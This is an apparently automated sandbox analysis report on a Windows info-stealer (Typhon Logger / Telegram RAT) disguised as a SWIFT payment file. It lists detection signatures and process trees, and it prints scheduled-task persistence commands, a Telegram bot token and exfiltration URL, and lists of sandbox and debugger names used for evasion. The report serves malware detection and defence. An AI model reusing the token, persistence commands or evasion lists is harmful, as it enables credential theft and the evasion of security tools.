Windows Analysis Report
SWIFT_USD_165092.exe

Overview

General Information

Sample Name: SWIFT_USD_165092.exe
Analysis ID: 872897
MD5: 22ba147ed50ff44941fe486426432115
SHA1: a113bcca40c9c420442533589311a74ef0e30e96
SHA256: bebd7434928eb7d1fb89a84ba41c3838fb5734f446b58b8bfb2d5dddf48e518b
Tags: exe

Detection

Typhon Logger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Yara detected Typhon Logger
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains functionality to log keystrokes (.Net Source)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • SWIFT_USD_165092.exe (PID: 5764 cmdline: C:\Users\user\Desktop\SWIFT_USD_165092.exe MD5: 22BA147ED50FF44941FE486426432115)
    • SWIFT_USD_165092.exe (PID: 5640 cmdline: C:\Users\user\Desktop\SWIFT_USD_165092.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 7068 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2372 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2832 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4724 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 7008 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6992 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 760 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4744 cmdline: cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5716 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
    • svchost.exe (PID: 5484 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 4768 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7132 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 996 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5220 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4436 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2372 cmdline: C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4756 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5740 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 3016 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 256 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • msiexec.exe (PID: 6876 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
  • svchost.exe (PID: 6708 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
    • svchost.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: 22BA147ED50FF44941FE486426432115)
      • tasklist.exe (PID: 920 cmdline: tasklist MD5: 6B7D2FC3FB98B10A5F77B23DEF745F6F)
        • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 204 cmdline: cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2448 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 4980 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5732 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171"}
{"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage"}
Memory dumps (Source | Rule | Description | Author):
0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TyphonLogger | Yara detected Typhon Logger | Joe Security
0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TyphonLogger | Yara detected Typhon Logger | Joe Security
Unpacked PE files (Source | Rule | Description | Author):
0.2.SWIFT_USD_165092.exe.4068d70.1.unpack | JoeSecurity_TyphonLogger | Yara detected Typhon Logger | Joe Security
0.2.SWIFT_USD_165092.exe.4068d70.1.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.SWIFT_USD_165092.exe.4068d70.1.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen
  • 0x1ffbff:$s12: d2lyZXNoYXJr
  • 0x1ffd15:$s21: eDY0ZGJn
  • 0x1ffcf3:$s22: eDMyZGJn
  • 0x1ffadf:$s23: ZG5zcHk
  • 0x1ffaa3:$s24: ZGU0ZG90
  • 0x1ffac5:$s25: aWxzcHk
0.2.SWIFT_USD_165092.exe.3e61140.0.unpack | JoeSecurity_TyphonLogger | Yara detected Typhon Logger | Joe Security
0.2.SWIFT_USD_165092.exe.3e61140.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

                    Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\SWIFT_USD_165092.exe, ParentImage: C:\Users\user\Desktop\SWIFT_USD_165092.exe, ParentProcessId: 5764, ParentProcessName: SWIFT_USD_165092.exe, ProcessCommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, ProcessId: 6992, ProcessName: cmd.exe
                    No Snort rule has matched


                    AV Detection

Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | Malware Configuration Extractor: Typhon Logger {"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171"}
Source: SWIFT_USD_165092.exe.5640.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage"}
Source: SWIFT_USD_165092.exe | ReversingLabs: Detection: 32%
Source: SWIFT_USD_165092.exe | Virustotal: Detection: 35%
Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | ReversingLabs: Detection: 32%
Source: SWIFT_USD_165092.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Joe Sandbox ML: detected
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: EMPTY
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 0
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: T
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: @@@ SMTP @@@
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1689002171
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: /eO5Wu0o3jBo7Qi1UeCW9eyxMtXnw8iw/UHRs8WHiTxrobIAH9bZcY5x8gT6FyBh00JY/BJdh6DvKOnJit0bdC0XKc2bUc3b8xK/BJDJYPomdL/ya0Q0R2SqqAOFlU6ySvVplhHRyqQ2cfF2Ss2R8NEMRHTZxYyW3ktDsxS/SOTbae6dDFlaUlfq4sfcrHhIiGXebAcihs7Kzw==
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: v1.0
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: v1.0.1
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: [{0:dd.MM.yyyyy HH.mm.ss}]={1}@{2}_{3}
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: .zip
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: /c rmdir /S /Q "
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: "
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: cmd.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: im_going_insane
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Analysis detected on
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: @
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: _
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Possible instance already running.
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Error on client!!!{0}
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: .bat
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: x
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: /C
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: --debug
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Detonate.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: IT-ADMIN
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Paul Jones
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: WALKER
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Sandbox
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: timmy
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: MalWorkstation
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: tim
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: vmware
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: sandbox
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: sand box
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: maltest
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: malware
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: virus
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: John Doe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Emily
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: CurrentUser
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: JohnDoe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: WDAGUtilityAccount
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Frank
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: JOHN-PC
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Peter Wilson
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: TVM
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: \\.\root\cimv2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: SELECT * FROM Win32_ComputerSystem
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Model
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: oracle
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: virtualbox
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: microsoft
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: virtual
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: hyper-v
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: xen
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: red hat
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: kvm
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ollydbg.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: processhacker.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: tcpview.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: autoruns.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: de4dot.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ilspy.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: dnspy.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: autorunsc.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: filemon.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: procmon.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: regmon.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: idaq.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: idaq64.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: immunitydebugger.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: wireshark.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: dumpcap.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: hookexplorer.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: lordpe.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: petools.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: resourcehacker.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: x32dbg.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: x64dbg.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: fiddler.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: vmware svga
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: detonate.exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: https://api.telegram.org/bot
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: /sendMessage?chat_id=
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: &text=
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: New TyphonLogger log!---------------------Username:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Machine name:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: HWID:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: IP address:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ---------------------Build Tag:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ---------------------Your logs are in the ZIP file being uploaded.Thank you for using TyphonLogger!https://t.me/typhon_shop
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: /send
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ?chat_id=
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: SMTP exfiltration method is not added yet.
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Likely old victim; Startup file not updated
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: New victim; Successfully installed to startup
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Error determining old or new victim; Not installed to startup
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Likely old victim; Registry key not updated
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: New victim; Successfully installed
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Error determining old or new victim; Registry not changed
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ???
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: .exe
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Microsoft\Windows\Start Menu\Programs\Startup
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ================Drive name : {0}Drive type : {1}Total drive size : {2} GBIs drive ready : {3}Drive format : {4}================
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Drive Info.txt
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1af0D797r2Iyt1D6TKua5uGsbZH6vpnoshKN65nU62kv+P1cEsvCbPMfu1b2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1brpEqJmsn8vqk3nUbaHj6XhOMOpo+i66EjVpIS/53Qy5eBBD9bfce4Cpkv2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1bqGXOdm/Tkv/gWiUfTCqKixO8m+78uy6ErCpYSGuHRmraVBQpeNOqtWpkv2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1bqKXeYj9n9t81fnHfPVtb30McKY692x/U6A9oLJhSB9tYQTQIaxHaFD4kv2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1brpEsA/sitn702jFODCt7PhNd60o8uzr3vJpsyGuHlA5ZMVSpeTNLwCpkv2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 1af0D797r2Iyt1D6TKua5uGsbZH6vpnoshKN65nU62kv+P1cEsvCbPMfu1b2WQ==
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ============ User Info ============
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: User Name =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Machine Name =
